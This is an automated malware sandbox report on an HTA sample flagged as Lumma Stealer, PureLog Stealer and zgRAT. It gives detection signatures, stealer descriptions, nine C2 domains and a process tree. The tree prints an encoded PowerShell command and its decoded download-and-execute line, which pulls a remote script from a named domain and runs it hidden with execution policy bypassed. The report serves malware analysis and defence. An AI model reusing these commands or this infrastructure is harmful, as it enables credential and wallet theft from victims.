Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
title.mp4.hta

Overview

General Information

Sample name:title.mp4.hta
Analysis ID:1584778
MD5:5ffa4145e79128ab1c56abfb5a8455d7
SHA1:e8cec6950853414976683615b1467b1d4dae8ee6
SHA256:3cf8f04202e09ddfff4c1febc10873a38258116fadd806ce1110f36445bbeaf0
Tags:htaLummaStealeruser-lontze7
Infos:

Detection

LummaC, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6880 cmdline: mshta.exe "C:\Users\user\Desktop\title.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwBsAGUAZQBwACAAMgAwADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AYwBhAGIAZgAuAGsAbABpAHAAZABlAHMAYQBrAC4AcwBoAG8AcAAvAHMAbQB1AGcAbABlAC4AYgBkACcAKQApAGAAIgAiACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4628 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://cabf.klipdesak.shop/smugle.bd'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1712 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • powershell.exe (PID: 5844 cmdline: powershell -exec bypass <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <style> body { font-family: system-ui; font-weight: 300; font-size: 1.25rem; color: #36393a; display: flex; align-items: center; justify-content: center; } main { max-width: 1200px; margin-top: 120px; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; } #text { max-width: 60%; margin-left: 1rem; margin-right: 1rem; } main > section > div { margin-bottom: 3.25rem; } svg { margin-left: 2rem; } @keyframes eye-1 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(-5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } @keyframes eye-2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-size: 3.75rem; font-weight: 400; margin-bottom: 0.5rem; } h3 { font-size: 2rem; font-weight: 400; color: #92979b; margin: 0; } a { color: #0055dc; } p { margin: 0; } #error-title { font-size: 2rem; margin-bottom: 1rem; } #footer-title { font-weight: 700; margin-bottom: 0.75rem; } </style> </head> <body> <main> <section id="text"> <div> <h1>Error 404</h1> <h3>Object not found</h3> </div> <div> <p> This object does not exist or is not publicly accessible at this URL. Check the URL of the object that you're looking for or contact the owner to enable Public access. </p> </div> <div> <p id="footer-title">Is this your bucket?</p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 414 212" fill="none" xmlns="http://www.w3.org/2000/svg" > <ellipse cx="208.5" cy="166.5" rx="174.5" ry="45.5" fill="#E2F5FA" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" fill="#C5EBF5" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M205.516 80.2674H139.419L148.186 141.237H197.788L205.516 80.2674Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="137" y="75" width="70.9351" height="9.39611" rx="2.40792" fill="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC" /> <path d="M122.692 10.2347H126.402V24.0345H122.692V10.2347Z" fill="#0055DC" /> <path d="M85.6775 57.6815H163.733V127.819H85.6775V57.6815Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M183.719 96.4263H179.429C179.429 96.4263 178.132 78.2631 163.565 71.5752V65.4338C169.87 67.9703 182.283 75.5798 183.719 96.4263Z" fill="#0055DC" /> <path d="M193.146 105.43L188.253 106.931C188.253 106.931 186.752 98.3591 181.394 99.6477C176.035 100.936 177.96 108.22 177.96 108.22H173.678C173.678 108.22 170.889 95.9857 180.537 94.0691C190.186 92.1524 193.146 105.43 193.146 105.43Z" fill="#0055DC" /> <path d="M65.5132 96.4345H69.795C69.795 96.4345 71.0999 78.2712 85.6583 71.5752V65.4338C79.3537 67.9377 66.916 75.5472 65.5132 96.4345Z" fill="#0055DC" /> <path d="M56.0777 105.406L60.9712 106.906C60.9712 106.906 62.472 98.3345 67.8304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C136.176 113.281 136.704 114.555 137.643 115.494C138.582 116.433 139.856 116.961 141.184 116.961C141.842 116.962 142.494 116.833 143.103 116.582C143.711 116.331 144.264 115.962 144.73 115.497C145.196 115.032 145.565 114.48 145.818 113.872C146.07 113.264 146.2 112.612 146.2 111.953C146.2 111.295 146.07 110.642 145.818 110.034C145.566 109.425 145.196 108.872 144.73 108.407C144.265 107.941 143.712 107.571 143.103 107.319C142.495 107.067 141.842 106.937 141.184 106.937C139.855 106.94 138.581 107.469 137.642 108.409C136.703 109.35 136.176 110.624 136.176 111.953V111.953Z" fill="#0055DC" /> <path d="M119.701 111.953C119.701 112.612 119.831 113.264 120.083 113.872C120.335 114.48 120.705 115.032 121.171 115.497C121.637 115.962 122.19 116.331 122.798 116.582C123.407 116.833 124.059 116.962 124.717 116.961C126.045 116.961 127.319 116.433 128.258 115.494C129.197 114.555 129.725 113.281 129.725 111.953C129.725 110.624 129.198 109.35 128.259 108.409C127.32 107.469 126.046 106.94 124.717 106.937C124.058 106.937 123.406 107.067 122.798 107.319C122.189 107.571 121.636 107.941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 113.872C104.018 114.48 104.387 115.032 104.853 115.497C105.319 115.962 105.872 116.331 106.481 116.582C107.089 116.833 107.741 116.962 108.399 116.961C109.728 116.961 111.001 116.433 111.94 115.494C112.88 114.555 113.407 113.281 113.407 111.953C113.407 110.624 112.88 109.35 111.941 108.409C111.002 107.469 109.728 106.94 108.399 106.937C107.069 106.937 105.793 107.466 104.853 108.407C103.912 109.347 103.384 110.623 103.384 111.953V111.953Z" fill="#0055DC" /> <path d="M163.419 57.6273H85.5901C85.5901 57.6273 86.8707 20.01 124.5 20.01C162.13 20.01 163.419 57.6273 163.419 57.6273Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M153.931 60.0436H159.587V126.787H153.931V60.0436Z" fill="white" /> <path d="M159.528 55.6816H153.703L149.151 32.3329C149.151 32.3329 158.005 44.3703 159.528 55.6816Z" fill="white" /> <path d="M139.792 48.9516C134.995 48.9516 131.106 45.0627 131.106 40.2656C131.106 35.4684 134.995 31.5795 139.792 31.5795C144.589 31.5795 148.478 35.4684 148.478 40.2656C148.478 45.0627 144.589 48.9516 139.792 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M108.821 48.9516C104.024 48.9516 100.135 45.0627 100.135 40.2655C100.135 35.4684 104.024 31.5795 108.821 31.5795C113.618 31.5795 117.507 35.4684 117.507 40.2655C117.507 45.0627 113.618 48.9516 108.821 48.9516Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path class="eye-1" d="M138.373 40.3055C138.373 41.4216 138.817 42.4921 139.606 43.2813C140.395 44.0706 141.466 44.5139 142.582 44.5139C143.697 44.5118 144.765 44.0674 145.552 43.2784C146.34 42.4894 146.782 41.4202 146.782 40.3055C146.78 39.1921 146.337 38.125 145.549 37.3378C144.762 36.5506 143.695 36.1073 142.582 36.1052C141.467 36.1052 140.398 36.5474 139.609 37.3349C138.82 38.1224 138.375 39.1907 138.373 40.3055V40.3055Z" fill="#6ECCE5" /> <path class="eye-1" d="M107.271 40.3055C107.271 41.4202 107.714 42.4894 108.501 43.2784C109.289 44.0674 110.357 44.5118 111.472 44.5139C112.588 44.5139 113.658 44.0706 114.447 43.2813C115.237 42.4921 115.68 41.4216 115.68 40.3055C115.678 39.1907 115.234 38.1224 114.445 37.3349C113.656 36.5474 112.586 36.1052 111.472 36.1052C110.358 36.1073 109.291 36.5506 108.504 37.3378C107.717 38.125 107.274 39.1921 107.271 40.3055V40.3055Z" fill="#6ECCE5" /> <path d="M84.8918 127.581H164.967C173.345 127.581 180.137 134.371 180.137 142.747C180.137 151.123 173.345 157.913 164.967 157.913H84.8918C76.5136 157.913 69.7218 151.123 69.7218 142.747C69.7218 134.371 76.5136 127.581 84.8918 127.581Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <g style="mix-blend-mode: multiply"> <path d="M152.026 142.831C151.99 145.395 152.973 147.869 154.76 149.709C156.547 151.549 158.992 152.603 161.556 152.641C164.12 152.603 166.565 151.549 168.352 149.709C170.139 147.869 171.122 145.395 171.086 142.831C171.122 140.266 170.139 137.792 168.352 135.953C166.565 134.113 164.12 133.058 161.556 133.02C158.992 133.058 156.547 134.113 154.76 135.953C152.973 137.792 151.99 140.266 152.026 142.831Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M137.081 152.641C131.818 152.641 127.552 148.249 127.552 142.831C127.552 137.412 131.818 133.02 137.081 133.02C142.344 133.02 146.611 137.412 146.611 142.831C146.611 148.249 142.344 152.641 137.081 152.641Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M103.074 142.831C103.038 145.395 104.021 147.869 105.808 149.709C107.595 151.549 110.039 152.603 112.604 152.641C115.168 152.603 117.613 151.549 119.4 149.709C121.187 147.869 122.17 145.395 122.134 142.831C122.17 140.266 121.187 137.792 119.4 135.953C117.613 134.113 115.168 133.058 112.604 133.02C110.039 133.058 107.595 134.113 105.808 135.953C104.021 137.792 103.038 140.266 103.074 142.831Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M78.598 142.831C78.5614 145.395 79.5447 147.869 81.3317 149.709C83.1186 151.549 85.5631 152.603 88.1276 152.641C90.692 152.603 93.1364 151.549 94.9234 149.709C96.7103 147.869 97.6936 145.395 97.6571 142.831C97.6936 140.266 96.7103 137.792 94.9234 135.953C93.1364 134.113 90.692 133.058 88.1276 133.02C85.5631 133.058 83.1186 134.113 81.3317 135.953C79.5447 137.792 78.5614 140.266 78.598 142.831Z" fill="#C5EBF5" /> </g> <path d="M103.252 71.1929H146.765V95.2437H103.252V71.1929Z" fill="#6ECCE5" /> <path d="M137.087 75.635H142.177V79.7379H137.087V75.635Z" fill="#0055DC" /> <path d="M129.852 75.635H134.934V79.7379H129.852V75.635Z" fill="#0055DC" /> <path d="M137.087 87.0141H142.177V91.1089H137.087V87.0141Z" fill="#0055DC" /> <path d="M129.852 87.0141H134.934V91.1089H129.852V87.0141Z" fill="#0055DC" /> <path d="M137.087 81.1718H142.177V85.2666H137.087V81.1718Z" fill="#0055DC" /> <path d="M129.852 81.1718H134.934V85.2666H129.852V81.1718Z" fill="#0055DC" /> <path d="M108.366 75.635H127.238V91.1078H108.366V75.635Z" fill="white" /> <path d="M119.345 49.2718C120.041 48.5443 120.865 47.9697 121.768 47.5786C122.671 47.1875 123.637 46.9869 124.612 46.9869C125.587 46.9869 126.553 47.1875 127.456 47.5786C128.359 47.9697 129.183 48.5443 129.879 49.2718" stroke="#0055DC" stroke-width="2" /> <path d="M274.751 12.7232C271.238 12.7232 268.39 9.87505 268.39 6.36162C268.39 2.8482 271.238 0 274.751 0C278.265 0 281.113 2.8482 281.113 6.36162C281.113 9.87505 278.265 12.7232 274.751 12.7232Z" fill="#0055DC" /> <path d="M272.877 9.68185H276.588V23.4817H272.877V9.68185Z" fill="#0055DC" /> <path d="M235.863 57.1286H313.919V127.266H235.863V57.1286Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M333.248 57.7026H328.958C328.958 57.7026 327.662 75.8658 313.095 82.5537V88.6951C319.4 86.1586 331.813 78.5491 333.248 57.7026Z" fill="#0055DC" /> <path d="M342.676 48.6986L337.782 47.1979C337.782 47.1979 336.282 55.7698 330.923 54.4812C325.565 53.1925 327.49 45.9093 327.49 45.9093H323.208C323.208 45.9093 320.419 58.1432 330.067 60.0598C339.715 61.9765 342.676 48.6986 342.676 48.6986Z" fill="#0055DC" /> <path d="M215.043 57.6946H219.325C219.325 57.6946 220.63 75.8578 235.188 82.5538V88.6953C228.884 86.1914 216.446 78.5819 215.043 57.6946Z" fill="#0055DC" /> <path d="M205.608 48.7232L210.501 47.2226C210.501 47.2226 212.002 55.7944 217.36 54.514C222.719 53.2335 220.786 45.9339 220.786 45.9339H225.076C225.076 45.9339 227.865 58.1678 218.217 60.0844C208.568 62.0011 205.608 48.7232 205.608 48.7232Z" fill="#0055DC" /> <path d="M286.361 111.401C286.361 112.729 286.889 114.003 287.828 114.942C288.767 115.881 290.041 116.409 291.369 116.409C292.028 116.41 292.68 116.281 293.288 116.03C293.897 115.779 294.45 115.41 294.915 114.945C295.381 114.48 295.751 113.927 296.003 113.319C296.255 112.711 296.385 112.059 296.385 111.401C296.385 110.742 296.255 110.09 296.003 109.482C295.751 108.873 295.382 108.32 294.916 107.854C294.45 107.389 293.897 107.019 293.289 106.767C292.68 106.515 292.028 106.385 291.369 106.385C290.04 106.387 288.767 106.917 287.828 107.857C286.889 108.798 286.361 110.072 286.361 111.401V111.401Z" fill="#0055DC" /> <path d="M269.887 111.401C269.887 112.059 270.017 112.711 270.269 113.319C270.521 113.927 270.891 114.48 271.357 114.945C271.823 115.41 272.376 115.779 272.984 116.03C273.593 116.281 274.245 116.41 274.903 116.409C276.231 116.409 277.505 115.881 278.444 114.942C279.383 114.003 279.911 112.729 279.911 111.401C279.911 110.072 279.383 108.798 278.445 107.857C277.506 106.917 276.232 106.387 274.903 106.385C274.244 106.385 273.592 106.515 272.984 106.767C272.375 107.019 271.822 107.389 271.356 107.854C270.89 108.32 270.521 108.873 270.269 109.482C270.017 110.09 269.887 110.742 269.887 111.401V111.401Z" fill="#0055DC" /> <path d="M253.569 111.401C253.569 112.059 253.699 112.711 253.951 113.319C254.204 113.927 254.573 114.48 255.039 114.945C255.505 115.41 256.058 115.779 256.666 116.03C257.275 116.281 257.927 116.41 258.585 116.409C259.914 116.409 261.187 115.881 262.126 114.942C263.066 114.003 263.593 112.729 263.593 111.401C263.593 110.072 263.066 108.798 262.127 107.857C261.188 106.917 259.914 106.387 258.585 106.385C257.255 106.385 255.979 106.914 255.039 107.854C254.098 108.795 253.569 110.071 253.569 111.401V111.401Z" fill="#0055DC" /> <path d="M313.604 57.0745H235.775C235.775 57.0745 237.056 19.4572 274.686 19.4572C312.315 19.4572 313.604 57.0745 313.604 57.0745Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M304.116 59.4908H309.773V126.234H304.116V59.4908Z" fill="white" /> <path d="M309.713 55.1288H303.889L299.336 31.7801C299.336 31.7801 308.19 43.8175 309.713 55.1288Z" fill="white" /> <path d="M259.006 48.4013C263.804 48.4013 267.692 44.5124 267.692 39.7152C267.692 34.918 263.804 31.0292 259.006 31.0292C254.209 31.0292 250.32 34.918 250.32 39.7152C250.32 44.5124 254.209 48.4013 259.006 48.4013Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path d="M289.977 48.4013C294.774 48.4013 298.663 44.5124 298.663 39.7152C298.663 34.918 294.774 31.0292 289.977 31.0292C285.18 31.0292 281.291 34.918 281.291 39.7152C281.291 44.5124 285.18 48.4013 289.977 48.4013Z" fill="white" stroke="#0055DC" stroke-width="2" stroke-miterlimit="10" /> <path class="eye-2" d="M260.425 39.7552C260.425 40.8713 259.981 41.9418 259.192 42.731C258.403 43.5202 257.333 43.9636 256.216 43.9636C255.102 43.9615 254.033 43.5171 253.246 42.7281C252.458 41.9391 252.016 40.8699 252.016 39.7552C252.018 38.6418 252.461 37.5747 253.249 36.7875C254.036 36.0002 255.103 35.557 256.216 35.5549C257.331 35.5549 258.4 35.9971 259.189 36.7846C259.978 37.5721 260.423 38.6404 260.425 39.7552V39.7552Z" fill="#6ECCE5" /> <path class="eye-2" d="M291.527 39.7552C291.527 40.8699 291.085 41.9391 290.297 42.7281C289.51 43.5171 288.441 43.9615 287.327 43.9636C286.21 43.9636 285.14 43.5202 284.351 42.731C283.562 41.9418 283.118 40.8713 283.118 39.7552C283.12 38.6404 283.565 37.5721 284.354 36.7846C285.143 35.9971 286.212 35.5549 287.327 35.5549C288.44 35.557 289.507 36.0002 290.294 36.7875C291.082 37.5747 291.525 38.6418 291.527 39.7552V39.7552Z" fill="#6ECCE5" /> <path d="M235.077 127.028H315.152C323.53 127.028 330.322 133.818 330.322 142.194C330.322 150.57 323.53 157.36 315.152 157.36H235.077C226.699 157.36 219.907 150.57 219.907 142.194C219.907 133.818 226.699 127.028 235.077 127.028Z" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <g style="mix-blend-mode: multiply"> <path d="M302.212 142.278C302.175 144.843 303.159 147.317 304.946 149.157C306.733 150.996 309.177 152.051 311.741 152.089C314.306 152.051 316.75 150.996 318.537 149.157C320.324 147.317 321.308 144.843 321.271 142.278C321.308 139.714 320.324 137.24 318.537 135.4C316.75 133.561 314.306 132.506 311.741 132.468C309.177 132.506 306.733 133.561 304.946 135.4C303.159 137.24 302.175 139.714 302.212 142.278Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M287.267 152.089C282.004 152.089 277.737 147.697 277.737 142.278C277.737 136.86 282.004 132.468 287.267 132.468C292.53 132.468 296.796 136.86 296.796 142.278C296.796 147.697 292.53 152.089 287.267 152.089Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M253.26 142.278C253.223 144.843 254.207 147.317 255.994 149.157C257.781 150.996 260.225 152.051 262.789 152.089C265.354 152.051 267.798 150.996 269.585 149.157C271.372 147.317 272.356 144.843 272.319 142.278C272.356 139.714 271.372 137.24 269.585 135.4C267.798 133.561 265.354 132.506 262.789 132.468C260.225 132.506 257.781 133.561 255.994 135.4C254.207 137.24 253.223 139.714 253.26 142.278Z" fill="#C5EBF5" /> </g> <g style="mix-blend-mode: multiply"> <path d="M228.783 142.278C228.747 144.843 229.73 147.317 231.517 149.157C233.304 150.996 235.749 152.051 238.313 152.089C240.877 152.051 243.322 150.996 245.109 149.157C246.896 147.317 247.879 144.843 247.843 142.278C247.879 139.714 246.896 137.24 245.109 135.4C243.322 133.561 240.877 132.506 238.313 132.468C235.749 132.506 233.304 133.561 231.517 135.4C229.73 137.24 228.747 139.714 228.783 142.278Z" fill="#C5EBF5" /> </g> <path d="M253.437 70.6394H296.951V94.6902H253.437V70.6394Z" fill="#6ECCE5" /> <path d="M287.272 75.0814H292.363V79.1842H287.272V75.0814Z" fill="#0055DC" /> <path d="M280.037 75.0814H285.119V79.1842H280.037V75.0814Z" fill="#0055DC" /> <path d="M287.272 86.4604H292.363V90.5552H287.272V86.4604Z" fill="#0055DC" /> <path d="M280.037 86.4604H285.119V90.5552H280.037V86.4604Z" fill="#0055DC" /> <path d="M287.272 80.6182H292.363V84.713H287.272V80.6182Z" fill="#0055DC" /> <path d="M280.037 80.6182H285.119V84.713H280.037V80.6182Z" fill="#0055DC" /> <path d="M258.552 75.0814H277.424V90.5542H258.552V75.0814Z" fill="white" /> <path d="M269.53 48.7169C270.226 47.9894 271.05 47.4149 271.953 47.0237C272.856 46.6326 273.822 46.432 274.797 46.432C275.772 46.432 276.738 46.6326 277.641 47.0237C278.545 47.4149 279.368 47.9894 280.064 48.7169" stroke="#0055DC" stroke-width="2" /> <path d="M409.67 76.5789H343.573L352.34 137.548H401.942L409.67 76.5789Z" fill="#C5EBF5" /> <path d="M409.67 76.5789H343.573L352.34 137.548H401.942L409.67 76.5789Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M409.67 76.5789H343.573L352.34 137.548H401.942L409.67 76.5789Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="341.154" y="71.3115" width="70.9351" height="9.39611" rx="2.40792" fill="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M409.671 93.3885H343.573L352.34 154.358H401.942L409.671 93.3885Z" fill="#C5EBF5" /> <path d="M409.671 93.3885H343.573L352.34 154.358H401.942L409.671 93.3885Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M409.671 93.3885H343.573L352.34 154.358H401.942L409.671 93.3885Z" stroke="#6ECCE5" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="341.154" y="88.1211" width="70.9351" height="9.39611" rx="2.40792" fill="#C5EBF5" stroke="#6ECCE5" stroke-width="2" /> <path d="M295.581 108.36H360.026L351.478 167.805H303.116L295.581 108.36Z" fill="#C5EBF5" /> <path d="M295.581 108.36H360.026L351.478 167.805H303.116L295.581 108.36Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M295.581 108.36H360.026L351.478 167.805H303.116L295.581 108.36Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="-1" y="1" width="69.1117" height="9.1112" rx="2.40792" transform="matrix(-1 0 0 1 361.359 102.25)" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M342.555 136.334H382.924L377.569 173.57H347.275L342.555 136.334Z" fill="#C5EBF5" /> <path d="M342.555 136.334H382.924L377.569 173.57H347.275L342.555 136.334Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M342.555 136.334H382.924L377.569 173.57H347.275L342.555 136.334Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="-1" y="1" width="42.5446" height="4.96009" rx="2.40792" transform="matrix(-1 0 0 1 383.012 132.506)" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> <path d="M17.328 102.337L6.64737 166.613L67.3531 167.939L75.3682 119.704L17.328 102.337Z" fill="#C5EBF5" /> <path d="M17.328 102.337L6.64737 166.613L67.3531 167.939L75.3682 119.704L17.328 102.337Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M17.328 102.337L6.64737 166.613L67.3531 167.939L75.3682 119.704L17.328 102.337Z" stroke="#0055DC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <rect x="1.15039" y="168.103" width="69.8978" height="9.23404" rx="2.40792" transform="rotate(-80.5655 1.15039 168.103)" fill="#C5EBF5" stroke="#0055DC" stroke-width="2" /> </svg> </section> </main> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["cloudewahsj.shop", "noisycuttej.shop", "quantitypitt.click", "rabidcowse.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "abruptyopsn.shop", "nearycrepso.shop"], "Build id": "yJaNLj--re4"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000005.00000002.2712557949.000000000C911000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        Process Memory Space: powershell.exe PID: 744JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
